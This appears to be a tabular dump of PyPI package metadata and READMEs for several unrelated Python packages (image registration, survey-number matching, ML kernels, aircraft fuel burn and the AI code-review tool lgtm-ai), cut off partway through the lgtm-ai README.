[Cookiecutter]: https://github.com/audreyr/cookiecutter
[@napari]: https://github.com/napari
[BSD-3]: http://opensource.org/licenses/BSD-3-Clause
[cookiecutter-napari-plugin]: https://github.com/napari/cookiecutter-napari-plugin
[file an issue]: https://gitlab.pasteur.fr/gletort/multireg/issues
[tox]: https://tox.readthedocs.io/en/latest/
[pip]: https://pypi.org/project/pip/
[PyPI]: https://pypi.org/
| text/markdown | Gaëlle Letort | gaelle.letort@pasteur.fr | null | null | BSD 3-Clause License Copyright (c) 2023, Gaëlle LETORT All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | null | [
"Framework :: napari",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Scientific/Engineering :: Image Processing"
] | [] | https://gitlab.pasteur.fr/gletort/multireg | null | >=3.9 | [] | [] | [] | [
"napari<=0.4.18",
"numpy",
"magicgui",
"qtpy",
"pyqt5",
"tifffile",
"imaris_ims_file_reader",
"czifile",
"itk==5.3.0",
"itk-registration",
"itk-elastix"
] | [] | [] | [] | [
"Bug Tracker, https://gitlab.pasteur.fr/gletort/multireg/issues",
"Documentation, https://gitlab.pasteur.fr/gletort/multireg#README.md",
"Source Code, https://gitlab.pasteur.fr/gletort/multireg"
] | twine/5.0.0 CPython/3.12.3 | 2026-02-20T09:19:41.044522 | multireg-0.0.19.tar.gz | 2,228,670 | 7e/81/8775081b46df8b98e57bb69a7ff745673e4ae4bb58f7111086a6f1f7fb4a/multireg-0.0.19.tar.gz | source | sdist | null | false | be34ff5ab4ac5314ff24c12d34ab80fb | 92310a479d1639e7cab42839b3abc5c6e803b7dfc921eb87c729ff670627889a | 7e818775081b46df8b98e57bb69a7ff745673e4ae4bb58f7111086a6f1f7fb4a | null | [] | 224 |
2.4 | TerraHarmonize | 0.1.5 | A powerful and efficient package designed for the SatSure Sage GIS team, enabling precise and seamless POC matching and D1-D2 matching across all states. | TerraHarmonize 🌍
🚀 Seamless & Accurate POC and D1-D2 Matching for All States
This package was built for SatSure SAGE 🛰️ to effortlessly match client data with internal datasets for proof-of-concept (POC) validation.
Whether you're working with geospatial surveys, land records, or administrative data, TerraHarmonize ensures precision, efficiency, and scalability across all states.
✨ Key Features:
✅ Fast & accurate POC matching 🏹
✅ Handles diverse data formats 📊
✅ Designed for scalability & performance ⚡
### Installation
```sh
pip install TerraHarmonize
```
### Examples
For converting regional characters to English.
```python
>>> from TerraHarmonize import TextFormatters, SurveyMatching
>>> string = '12/अ/1'
>>> print(TextFormatters.regional_to_english_village(string,'Hi'))
'12/A/1'
```
For getting the indices of the best matches.
```python
>>> from TerraHarmonize import TextFormatters, SurveyMatching
>>> string = '13/A1'
>>> comparing_list = ['13/A1','14/A/1','12/A/1','13/అ','13-అ/1']
# correct matches are at indices [0, 3, 4], i.e. '13/A1', '13/అ', '13-అ/1'
>>> print(SurveyMatching(string,comparing_list).poc_matching_simple(split_pattern= r"\/|\-"))
[0]
>>> print(SurveyMatching(string,comparing_list).poc_matching(include='both',state='AP'))
[0, 3, 4]
```
Adding **/** in between a number and a letter.
```python
>>> from TerraHarmonize import TextFormatters, SurveyMatching
>>> data = '13/1AA/BB1/E'
>>> updated_data = TextFormatters.normalize_alpha_num_slash(data,'En')
>>> print(updated_data)
'13/1/AA/BB/1/E'
```
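Conceptually, this normalization can be reproduced with a single regular expression that inserts `/` at every digit-to-letter or letter-to-digit boundary. An illustrative re-implementation for Latin script only (not the package's actual code, which also handles regional scripts):

```python
import re

def normalize_alpha_num_slash(value):
    """Insert '/' at every digit-to-letter or letter-to-digit boundary."""
    return re.sub(r"(?<=\d)(?=[A-Za-z])|(?<=[A-Za-z])(?=\d)", "/", value)

print(normalize_alpha_num_slash("13/1AA/BB1/E"))  # 13/1/AA/BB/1/E
```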
```python
>>> import pandas as pd
>>> from TerraHarmonize import SurveyMatching
>>> data = {
"district": ["District A", "District B", "District C"],
"tehsil": ["Tehsil X", "Tehsil Y", "Tehsil Z"],
"village": ["Village 1", "Village 2", "Village 3"],
"survey_number_client": ["13/1/अ", "23/2A", "789/1"],
"survey_number_satsure": [["13/1", "13/1/A", "13/2/1"], ["456A", "23/2", "23/2/अ"], ["324/1", "121/2"]],
"survey_id": [["ID_1", "ID_2", "ID_3"], ["ID_4", "ID_5", "ID_6"], ["ID_7", "ID_8"]]
}
>>> df = pd.DataFrame(data)
>>> matching = SurveyMatching.poc_matching_dataframe(df,'survey_number_client',
'survey_number_satsure','survey_id',
include='both',
state='MH').fillna('missing')
```
📖 **More Examples & Usage** https://github.com/CM-SS155/TerraHarmonize-Docs
| text/markdown | chandramohan | chandramohan@satsure.co | null | null | GPLv3 | SatSure, TerraHarmonize, Sage, POC | [
"License :: Other/Proprietary License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10"
] | [] | null | null | <3.11,>=3.9 | [] | [] | [] | [
"fuzzywuzzy==0.18.0",
"numpy<2.0,>=1.24",
"pandas<2.2,>=2.0"
] | [] | [] | [] | [
"Documentation, https://terraharmonize-docs.readthedocs.io/en/latest/index.html"
] | poetry/2.3.2 CPython/3.10.14 Linux/6.8.0-100-generic | 2026-02-20T09:18:13.925877 | terraharmonize-0.1.5-py3-none-any.whl | 22,895 | 8b/9a/e27eb9a943b9abc56d386ba2e9e0b3a058585f93738dd8c0497dba0e15ac/terraharmonize-0.1.5-py3-none-any.whl | py3 | bdist_wheel | null | false | 49638cea8517839d6e794fbbc984ac3d | 73ebbff711cd4a5b3fa6632e777ee1c8b4c0a58d2ec508c82089adf81729469e | 8b9ae27eb9a943b9abc56d386ba2e9e0b3a058585f93738dd8c0497dba0e15ac | null | [
"LICENSE"
] | 0 |
2.2 | kernelforge | 0.1.19 | Optimized Kernels for ML | # KernelForge - Optimized Kernels for ML
[](https://github.com/andersx/kernelforge/actions/workflows/ci.yml)
[](https://github.com/andersx/kernelforge/actions/workflows/code-quality.yml)
[](https://pypi.org/project/kernelforge/)
[](https://pypi.org/project/kernelforge/)
[](https://github.com/andersx/kernelforge)
[](https://opensource.org/licenses/MIT)
I really only care about writing optimized kernel code, so this project will be completed as I find additional time... XD
I'm reviving this project to finish an old project using random Fourier features for kernel ML.
# Installation
## Quick Start (Recommended)
For most users, install from PyPI:
```bash
pip install kernelforge
```
This installs pre-compiled wheels with optimized BLAS libraries:
- **Linux**: OpenBLAS
- **macOS**: Apple Accelerate framework
**Requirements**: Python 3.10+
## Development Installation
### Linux
```bash
# Create virtual environment with uv
uv venv
source .venv/bin/activate
# Install in editable mode with test dependencies
make install-linux
# Or manually:
CMAKE_ARGS="-DKF_USE_NATIVE=ON" uv pip install -e .[test] --verbose
```
### macOS
macOS requires Homebrew LLVM for OpenMP support:
```bash
# Install dependencies
brew install llvm libomp
# Create virtual environment
uv venv
source .venv/bin/activate
# Install in editable mode
make install-macos
# Or manually:
CMAKE_ARGS="-DCMAKE_C_COMPILER=/opt/homebrew/opt/llvm/bin/clang -DCMAKE_CXX_COMPILER=/opt/homebrew/opt/llvm/bin/clang++ -DKF_USE_NATIVE=ON" uv pip install -e .[test] --verbose
```
**Note**: The `-DKF_USE_NATIVE=ON` flag enables `-march=native`/`-mcpu=native` optimizations for maximum performance on your specific CPU.
## Advanced: Custom BLAS/LAPACK Libraries
### Intel MKL (Linux)
```bash
# Install Intel oneAPI Base Toolkit
sudo apt install intel-basekit
# Set up environment
source /opt/intel/oneapi/setvars.sh
# Install (MKL will be auto-detected by CMake)
uv pip install -e .[test] --verbose
# Optional: Use Intel compilers
CC=icx CXX=icpx uv pip install -e .[test] --verbose
```
**Note**: In practice, GCC/G++ with OpenBLAS performs similarly to (or better than) Intel compilers with MKL. On macOS, LLVM with Accelerate framework is highly optimized for Apple Silicon.
## Timings
I've rewritten a few of the kernels from the original QML code completely in C++.
There are performance gains in most cases.
These are primarily due to better use of BLAS routines for calculating, for example, Gramian sub-matrices with chunked DGEMM/DSYRK calls, etc.
In the gradient and Hessian matrices there are also some algorithmic improvements and pre-computed terms.
Memory usage might be a bit higher, but this could be optimized with more fine-grained chunking if needed.
More is coming as I find the time ...
Some speedups vs the original QML code are shown below:
| Benchmark | QML [s] | Kernelforge [s] |
|:---------------|------------:|--------------------:|
| Upper triangle Gaussian kernel (16K x 16K) | 1.82 | 0.64 |
| 1K FCHL19 descriptors (1K) | ? | 0.43 |
| 1K FCHL19 descriptors+jacobian (1K) | ? | 0.62 |
| FCHL19 Local Gaussian scalar kernel (10K x 10K) | 76.81 | 18.15 |
| FCHL19 Local Gaussian gradient kernel (1K x 2700K) | 32.54 | 1.52 |
| FCHL19 Local Gaussian Hessian kernel (5400K x 5400K) | 29.68 | 2.05 |
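For reference, a naive NumPy version of the Gaussian kernel matrix these benchmarks measure looks like this (an illustrative sketch only; the C++ implementation chunks the DGEMM/DSYRK calls and fills only the upper triangle):

```python
import numpy as np

def gaussian_kernel(X, Y, sigma):
    """Naive Gaussian kernel matrix: K[i, j] = exp(-||x_i - y_j||^2 / (2 * sigma^2))."""
    sq_dists = (
        np.sum(X * X, axis=1)[:, None]
        + np.sum(Y * Y, axis=1)[None, :]
        - 2.0 * (X @ Y.T)  # the dominant cost: one large matrix product (DGEMM)
    )
    # Clamp tiny negative values caused by floating-point cancellation.
    return np.exp(-np.maximum(sq_dists, 0.0) / (2.0 * sigma * sigma))

X = np.array([[0.0, 0.0], [1.0, 0.0]])
K = gaussian_kernel(X, X, sigma=1.0)
print(np.allclose(np.diag(K), 1.0), np.isclose(K[0, 1], np.exp(-0.5)))  # True True
```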
## TODO list
The goal is to remove pain-points of existing QML libraries
- Removal of Fortran dependencies
- No Fortran-ordered arrays
- No Fortran compilers needed
- Simplified build system
- No cooked F2PY/Meson build system, just CMake and Pybind11
- Improved use of BLAS routines, with built-in chunking to avoid memory explosions
- Better use of pre-computed terms for single-point inference/MD kernels
- Low overhead with Pybind11 shims and better aligned memory?
- Simplified entrypoints that are compatible with RDKit, ASE, Scikit-learn, etc.
- A few high-level functions that do the most common tasks efficiently and correctly
- Efficient FCHL19 out-of-the-box
- Fast training with random Fourier features
- With derivatives
## Priority list for the next months:
- [x] Finish the inverse-distance kernel and its Jacobian
- [x] Make Pybind11 interface
- [ ] Finalize the C++ interface
- [x] Finish the Gaussian kernel
- [x] Notebook with rMD17 example
- [x] Finish the Jacobian and Hessian kernels
- [x] Notebook with rMD17 forces example
- FCHL19 support:
- [x] Add FCHL19 descriptors
- [x] Add FCHL19 kernels (local/elemental)
- [x] Add FCHL19 descriptor with derivatives
- [x] Add FCHL19 kernel Jacobian
- [x] Add FCHL19 kernel Hessian (GDML-style)
- [ ] Improve FCHL19 kernel Jacobian performance (it's poor)
- Finish the random Fourier features kernel and its Jacobian
- [ ] Parallel random basis sampler
- [ ] RFF kernel for global descriptors
- [ ] SVD and QR solvers for rectangular matrices
- [ ] RFF kernel for local descriptors (FCHL19)
- [ ] RFF kernels with Cholesky solver and chunked DSYRK kernel updates
- [ ] RFF kernels with RFP format with chunked DSFRK kernel updates
- [ ] RFF kernel Jacobian for global descriptors
- [ ] RFF kernel Jacobian for local descriptors (FCHL19)
- [ ] Notebook with rMD17 random Fourier features examples
- Science:
- Benchmark full kernel vs RFF on rMD17 and QM7b and QM9
- Both FCHL19 and inverse-distance matrix
#### Todos:
- Housekeeping:
- [x] Pybind11 bindings and CMake build system
- [x] Setup CI with GitHub Actions
- [x] Rewrite existing kernels to C++ (no Fortran)
- [x] Setup GHA to build PyPI wheels
- [x] Test Linux build matrices
- [x] Test MacOS build matrices
- [ ] Test Windows build matrices
  - [x] Add builds for all Python versions >=3.11
- [ ] Plan structure for saving models for inference as `.npz` files
- Ensure correct linking with optimized BLAS/LAPACK libraries:
- [x] OpenBLAS (Linux) <- also used in wheels
- [x] MKL (Linux)
- [x] Accelerate (MacOS)
- Add global kernels:
- [x] Gaussian kernel
- [x] Jacobian/gradient kernel
- [ ] Optimized Jacobian kernel for single inference
- [x] Hessian kernel
- [x] GDML-like kernel
- [ ] Full GPR kernel
- Add local kernels:
- [x] Gaussian kernel
- [x] Jacobian/gradient kernel
- [x] Optimized Jacobian kernel for single inference
- [x] Hessian kernel (GDML-style)
- [ ] Full GPR kernel
- [ ] Optimized GPR kernel with pre-computed terms for single inference/MD
- Add random Fourier features kernel code:
- [ ] Fourier-basis sampler
- [ ] RFF kernel
- [ ] RFF gradient kernel
- [ ] RFF chunked DSYRK kernel
- [ ] Optimized RFF gradient kernel for single inference/MD
- The same as above, just for Hadamard features when I find the time?
- GDML and sGDML kernels:
- [x] Inverse-distance matrix descriptor
- [ ] Packed Jacobian for inverse-distance matrix
- [x] GDML kernel (brute-force implemented)
- [ ] sGDML kernel (brute-force implemented)
- [ ] Full GPR kernel
- [ ] Optimized GPR kernel with pre-computed terms for single inference/MD
- FCHL18 support:
- [ ] Complete rewrite of FCHL18 analytical scalar kernel in C++
- [ ] Stretch goal 1: Add new analytical FCHL18 kernel Jacobian
- [ ] Stretch goal 2: Add new analytical FCHL18 kernel Hessian (+GPR/GDML-style)
- [ ] Stretch goal 3: Attempt to optimize hyperparameters and cut-off functions
- Add standard solvers:
- [x] Cholesky in-place solver
- [x] L2-reg kwarg
- [x] Toggle destructive vs non-destructive
- [ ] QR and/or SVD for non-square matrices
- Add molecular descriptors with derivatives:
- [ ] Coulomb matrix + misc variants without derivatives
- [x] FCHL19 + derivatives
- [x] GDML-like inverse-distance matrix + derivatives
#### Stretch goals:
- [ ] Plan RDKit interface
- [ ] Plan Scikit-learn interface
- [ ] Plan ASE interface
| text/markdown | Anders Christensen | null | null | null | MIT | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Chemistry"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=2.00",
"typing-extensions>=4.0.0; python_version < \"3.11\"",
"pytest>=8; extra == \"test\"",
"pytest-xdist; extra == \"test\"",
"pytest-timeout; extra == \"test\"",
"ruff>=0.8.0; extra == \"dev\"",
"ty; extra == \"dev\"",
"pre-commit>=3.6.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/andersx/kernelforge",
"Issues, https://github.com/andersx/kernelforge/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:18:10.536533 | kernelforge-0.1.19.tar.gz | 3,374,399 | 93/33/1fc378e155c7b0a5f2bd5f8039157c923c87a59ee0f784bfb169386465ff/kernelforge-0.1.19.tar.gz | source | sdist | null | false | f09e3aaddb73e2d0d019105c588bd666 | 7a2b423d05f65b49c527e6e85faef5e157870c83b3708ca9403b017d757fa70c | 93331fc378e155c7b0a5f2bd5f8039157c923c87a59ee0f784bfb169386465ff | null | [] | 753 |
2.4 | jetfuelburn | 2.0.1 | A Python package for calculating fuel burn of commercial aircraft. | # JetFuelBurn
[](h[ttps://pypi.org/project/jetfuelburn/](https://pypistats.org/packages/jetfuelburn))
[](https://pypi.org/project/jetfuelburn/)

[](https://pypi.org/project/jetfuelburn/)
[](https://github.com/psf/black)
A Python package for calculating fuel burn of commercial aircraft.
Maintenance Team: [@michaelweinold](https://github.com/michaelweinold)
## Installation
See [the package documentation](https://jetfuelburn.readthedocs.io/) for installation instructions.
## Development
### Documentation
The package documentation is based on [`mkdocs`](https://www.mkdocs.org). To build the documentation locally, install required packages from the `docs/_requirements.txt` file and navigate to the package root directory to execute:
```bash
mkdocs serve
```
### Testing
Package tests are based on [`pytest`](https://docs.pytest.org/en/stable/). To run all tests, navigate to the package root directory and execute:
```bash
pytest
```
When developing with Visual Studio Code, tests can also be run from [the Test Explorer sidebar](https://code.visualstudio.com/docs/python/testing).
### CI/CD
The package uses [GitHub Actions](https://github.com/features/actions) for continuous integration and deployment. The CI/CD pipeline is defined in the `.github/workflows` directory.
| Workflow | Description | Trigger |
|----------|-------------|---------|
| `.github/workflows/test_package.yml` | Runs all tests. | Every new pull request and push to the `main` branch. |
| `.github/workflows/publish_testpypi.yml` | Runs all tests and uploads the package to TestPyPI. | Every new version `tag`. |
| `.github/workflows/publish_pypi.yml` | Runs all tests and uploads the package to PyPI. | Every new version `release`. |
| text/markdown | null | Michael Weinold <michaelphilippweinold+jetfuelburn@gmail.com> | null | Michael Weinold <michaelphilippweinold+jetfuelburn@gmail.com> | MIT | null | [
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Natural Language :: English",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"pint",
"pytest; extra == \"testing\"",
"pytest-cov; extra == \"testing\"",
"python-coveralls; extra == \"testing\""
] | [] | [] | [] | [
"source, https://github.com/sustainableaviation/jetfuelburn",
"homepage, https://jetfuelburn.readthedocs.io",
"tracker, https://github.com/sustainableaviation/jetfuelburn/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:18:02.304591 | jetfuelburn-2.0.1.tar.gz | 276,573 | be/1d/9fe96df184d3b96d619f60aaaed8b1d3be99a064e1672a69c7b51970fcf1/jetfuelburn-2.0.1.tar.gz | source | sdist | null | false | f3f49b22446b05bb5792b497b09f0581 | fca56b1dd419751c1b23c403cf2413e81788d85dd9b7f2c898c2d69baf75211e | be1d9fe96df184d3b96d619f60aaaed8b1d3be99a064e1672a69c7b51970fcf1 | null | [
"LICENSE.txt"
] | 211 |
2.4 | lgtm-ai | 1.5.2 | Your AI-powered code review companion |
<p align="center">
<img alt="lgtm-logo" width="150" src="https://raw.githubusercontent.com/elementsinteractive/lgtm-ai/main/assets/lgtm-large.png">
</p>
# lgtm-ai


[](https://github.com/astral-sh/ruff)
[](https://pypi.org/project/lgtm-ai/)
[](https://hub.docker.com/r/elementsinteractive/lgtm-ai)
[](https://github.com/marketplace/actions/lgtm-ai-code-review)
[](LICENSE)
---
lgtm-ai is your AI-powered code review companion. It generates code reviews using your favorite LLMs and helps human reviewers with detailed, context-aware reviewer guides. Supports GitHub, GitLab, and major AI models including GPT-4, Claude, Gemini, and more.
**Table of Contents**
- [Quick Usage](#quick-usage)
- [Review](#review)
- [Local Changes](#local-changes)
- [Reviewer Guide](#reviewer-guide)
- [Installation](#installation)
- [How it works](#how-it-works)
- [Review scores and comment categories](#review-scores-and-comment-categories)
- [Supported Code Repository Services](#supported-code-repository-services)
- [Using Issue/User Story Information](#using-issueuser-story-information)
- [Supported AI models](#supported-ai-models)
- [Summary](#summary)
- [OpenAI](#openai)
- [Google Gemini](#google-gemini)
- [Anthropic's Claude](#anthropics-claude)
- [Mistral AI](#mistral-ai)
- [DeepSeek](#deepseek)
- [Local models](#local-models)
- [CI/CD Integration](#cicd-integration)
- [Configuration](#configuration)
- [Main options](#main-options)
- [Review options](#review-options)
- [Issues Integration options](#issues-integration-options)
- [Example `lgtm.toml`](#example-lgtmtoml)
- [Contributing](#contributing)
- [Running the project](#running-the-project)
- [Managing requirements](#managing-requirements)
- [Commit messages](#commit-messages)
- [Contributors ✨](#contributors-)
## Quick Usage
### Review
```sh
lgtm review --ai-api-key $OPENAI_API_KEY \
--git-api-key $GITLAB_TOKEN \
--model gpt-5 \
--publish \
"https://gitlab.com/your-repo/-/merge-requests/42"
```
This will generate a **review** like this one:
<img src="https://raw.githubusercontent.com/elementsinteractive/lgtm-ai/main/assets/review.png" alt="lgtm-review" height="250"/>
<br/>
<img src="https://raw.githubusercontent.com/elementsinteractive/lgtm-ai/main/assets/review-comment.png" alt="lgtm-review-comment" height="250"/>
#### Local Changes
You can also review local changes without a pull request:
```sh
lgtm review --ai-api-key $OPENAI_API_KEY \
--model gpt-5 \
--compare main \
path/to/git/repo
```
### Reviewer Guide
```sh
lgtm guide --ai-api-key $OPENAI_API_KEY \
--git-api-key $GITLAB_TOKEN \
--model gpt-5 \
--publish \
"https://gitlab.com/your-repo/-/merge-requests/42"
```
This will generate a **reviewer guide** like this one:
<img src="https://raw.githubusercontent.com/elementsinteractive/lgtm-ai/main/assets/reviewer-guide.png" alt="lgtm-review-guide" height="250"/>
## Installation
```sh
pip install lgtm-ai
```
Or you can use the official Docker image:
```sh
docker pull elementsinteractive/lgtm-ai
```
## How it works
lgtm reads the given pull request and feeds it to several AI agents to generate a code review or a reviewer guide. The philosophy of lgtm is to keep the model choice open and fully configurable, so that you can choose which model to use based on pricing, security, data privacy, or whatever is important to you.
If instructed (with the option `--publish`), lgtm will publish the review or guide to the pull request page as comments.
### Review scores and comment categories
Reviews generated by lgtm will be assigned a **score**, using the following scale:
| Score | Description |
| ------ | --- |
| LGTM 👍 | The PR is generally ready to be merged. |
| Nitpicks 🤓 | There are some minor issues, but the PR is almost ready to be merged. |
| Needs Work 🔧 | There are some issues with the PR, and it is not ready to be merged. The approach is generally good, the fundamental structure is there, but there are some issues that need to be fixed. |
| Needs a Lot of Work 🚨 | Issues are major, overarching, and/or numerous. However, the approach taken is not necessarily wrong. |
| Abandon ❌ | The approach taken is wrong, and the author needs to start from scratch. The PR is not ready to be merged as is at all. |
For each review, lgtm may create several inline comments, pointing out specific issues within the PR. These comments belong to a **category** and have a **severity**. You can configure which categories you want lgtm to take a look at (see the [configuration section below](#configuration)). The available categories are:
| Category | Description |
| ------- | ----------- |
| Correctness 🎯 | Does the code behave as intended? Identifies logical errors, bugs, incorrect algorithms, broken functionality, or deviations from requirements. |
| Quality ✨ | Is the code clean, readable, and maintainable? Evaluates naming, structure, modularity, and adherence to clean code principles (e.g., SOLID, DRY, KISS). |
| Testing 🧪 | Are there sufficient and appropriate tests? Includes checking for meaningful test coverage, especially for edge cases and critical paths. Are tests isolated, reliable, and aligned with the behavior being verified? |
| Security 🔒 | Does the code follow secure programming practices? Looks for common vulnerabilities such as injection attacks, insecure data handling, improper access control, hardcoded credentials, or lack of input validation. |
There are three available severities for comments:
- LOW 🔵
- MEDIUM 🟡
- HIGH 🔴
### Supported Code Repository Services
lgtm aims to work with as many services as possible, and that includes remote repository providers. At the moment, lgtm supports:
- [GitLab](https://gitlab.com) (both gitlab.com and [self-managed](https://about.gitlab.com/install/)).
- [GitHub](https://github.com)
lgtm will autodetect the URL of the pull request passed as an argument.
### Using Issue/User Story Information
lgtm-ai can enhance code reviews by including context from linked issues or user stories (e.g., GitHub/GitLab issues). This helps the AI understand the purpose and requirements of the PR.
**How to use:**
- Provide the following options to the `lgtm review` command:
- `--issues-url`: The base URL of the issues or user story page.
- `--issues-platform`: The platform for the issues (e.g., `github`, `gitlab`, `jira`).
- `--issues-regex`: (Optional) A regex pattern to extract the issue ID from the PR title or description.
- `--issues-api-key`: (Optional) API key for the issues platform (if different from `--git-api-key`).
- `--issues-user`: (Optional) Username for the issues platform (required if source is `jira`).
**Example:**
```sh
lgtm review \
--issues-url "https://github.com/your-org/your-repo/issues" \
--issues-platform github \
--issues-regex "(?:Fixes|Resolves) #(\d+)" \
--issues-api-key $GITHUB_TOKEN \
...
"https://github.com/your-org/your-repo/pull/42"
```
- These options can also be set in the `lgtm.toml` configuration file, see more in the [configuration section](#configuration).
- lgtm will automatically extract the issue ID from the PR metadata using the provided regex, fetch the issue content, and include it as additional context for the review.
**Notes:**
- GitHub, GitLab, and [JIRA cloud](https://developer.atlassian.com/cloud/jira/platform/) issues are supported.
- If `--issues-api-key` is not provided, lgtm will use `--git-api-key` for authentication.
- If no issue is found, the review will proceed without issue context.
- lgtm provides a default regex for extracting issue IDs that works with [conventional commits](https://www.conventionalcommits.org). This means you often do not need to specify `--issues-regex` if your PR titles or commit messages follow the conventional commit format (e.g., `feat(#123): add new feature`), or if your PR descriptions contain mentions to issues like: `refs: #123` or `closes: #123`.
### Supported AI models
lgtm supports several AI models so you can hook up your preferred LLM to perform reviews for you.
This is the full list of supported models:
#### Summary
| Provider | Example Models | API Key Setup |
|-------------|---------------------------------|-------------------------------------------------------------------------------|
| **OpenAI** | `gpt-5`, `gpt-4.1`, `gpt-4o-mini`, `o1-preview` | [Generate API key](https://platform.openai.com/api-keys) |
| **Google Gemini** | `gemini-2.5-pro`, `gemini-2.5-flash` | [Get API key](https://aistudio.google.com/apikey) |
| **Anthropic (Claude)** | `claude-opus-4-5`, `claude-sonnet-4-5`, `claude-haiku-4-5` | [Anthropic Console](https://console.anthropic.com/dashboard) |
| **Mistral** | `mistral-large-latest`, `mistral-small`, `codestral-latest` | [Mistral Platform](https://console.mistral.ai/api-keys) |
| **DeepSeek** | `deepseek-chat`, `deepseek-reasoner` | [DeepSeek Platform](https://platform.deepseek.com/usage) |
| **Local / Custom** | Any OpenAI-compatible model (e.g. `llama3`) | Run with `--model-url http://localhost:11434/v1` |
#### OpenAI
Check out the OpenAI platform page to see [all available models provided by OpenAI](https://platform.openai.com/docs/overview).
To use OpenAI LLMs, you need to provide lgtm with an API Key, which can be generated in the [OpenAI platform page for your project, or your user](https://platform.openai.com/api-keys).
<details>
<summary>Supported OpenAI models</summary>
These are the main supported models, though the CLI may support additional ones due to the use of [pydantic-ai](https://ai.pydantic.dev).
| Model name |
| -------- |
| gpt-5 |
| gpt-5-mini |
| gpt-4.1 |
| gpt-4.1-mini |
| gpt-4.1-nano |
| gpt-4o * |
| gpt-4o-mini |
| o4-mini |
| o3-mini |
| o3 |
| o1-preview |
| o1-mini |
| o1 |
| gpt-4-turbo |
| gpt-4 |
| gpt-3.5-turbo |
| chatgpt-4o-latest |
</details>
#### Google Gemini
Check out the [Gemini developer docs](https://ai.google.dev/gemini-api/docs/models) to see all models provided by Google.
To use Gemini LLMs, you need to provide lgtm with an API Key, which can be generated [here](https://aistudio.google.com/apikey).
These are the main supported models, though the CLI may support additional ones due to the use of [pydantic-ai](https://ai.pydantic.dev). Google timestamps Gemini model releases, so be sure to always use the latest model of each family when possible.
For Gemini models exclusively, you can provide a wildcard at the end of the model name and lgtm will attempt to select the latest model (e.g., `gemini-2.5-pro*`).
<details>
<summary>Supported Google's Gemini models</summary>
| Model name |
| ----------- |
| gemini-2.5-pro |
| gemini-2.5-pro-preview-06-05 |
| gemini-2.5-pro-preview-05-06 |
| gemini-2.5-flash |
| gemini-2.0-pro-exp-02-05 |
| gemini-1.5-pro |
| gemini-1.5-flash |
</details>
#### Anthropic's Claude
Check out [Anthropic documentation](https://docs.anthropic.com/en/docs/about-claude/models/all-models) to see which models they provide. lgtm works with a subset of Claude models. To use Anthropic LLMs, you need to provide lgtm with an API Key, which can be generated from the [Anthropic Console](https://console.anthropic.com/dashboard).
<details>
<summary>Supported Anthropic models</summary>
These are the main supported models, though the CLI may support additional ones due to the use of [pydantic-ai](https://ai.pydantic.dev).
| Model name |
| ---------------------------- |
| claude-opus-4-5 |
| claude-sonnet-4-5 |
| claude-haiku-4-5 |
| claude-opus-4-1-20250805 |
| claude-sonnet-4-0 |
| claude-3-7-sonnet-latest |
| claude-3-5-sonnet-latest |
| claude-3-5-haiku-latest |
| claude-3-opus-latest |
</details>
#### Mistral AI
Check out the [Mistral documentation](https://docs.mistral.ai/getting-started/models/models_overview/) to see all models provided by Mistral.
To use Mistral LLMs, you need to provide lgtm with an API Key, which can be generated from Mistral's [La Plateforme](https://console.mistral.ai/api-keys).
<details>
<summary>Supported Mistral AI models</summary>
These are the main supported models, though the CLI may support additional ones due to the use of [pydantic-ai](https://ai.pydantic.dev).
| Model name |
| ------------------ |
| mistral-large-latest |
| mistral-small |
| codestral-latest |
</details>
#### DeepSeek
Check out the [DeepSeek documentation](https://api-docs.deepseek.com/quick_start/pricing) to see all models provided by DeepSeek.
At the moment, lgtm only supports DeepSeek from `https://api.deepseek.com`: other providers and custom URLs are not supported yet, but this is on our roadmap!
To get an API key for DeepSeek, create one at [DeepSeek Platform](https://platform.deepseek.com/usage).
<details>
<summary>Supported DeepSeek models</summary>
| Model name |
| ----------- |
| deepseek-chat |
| deepseek-reasoner |
</details>
#### Local models
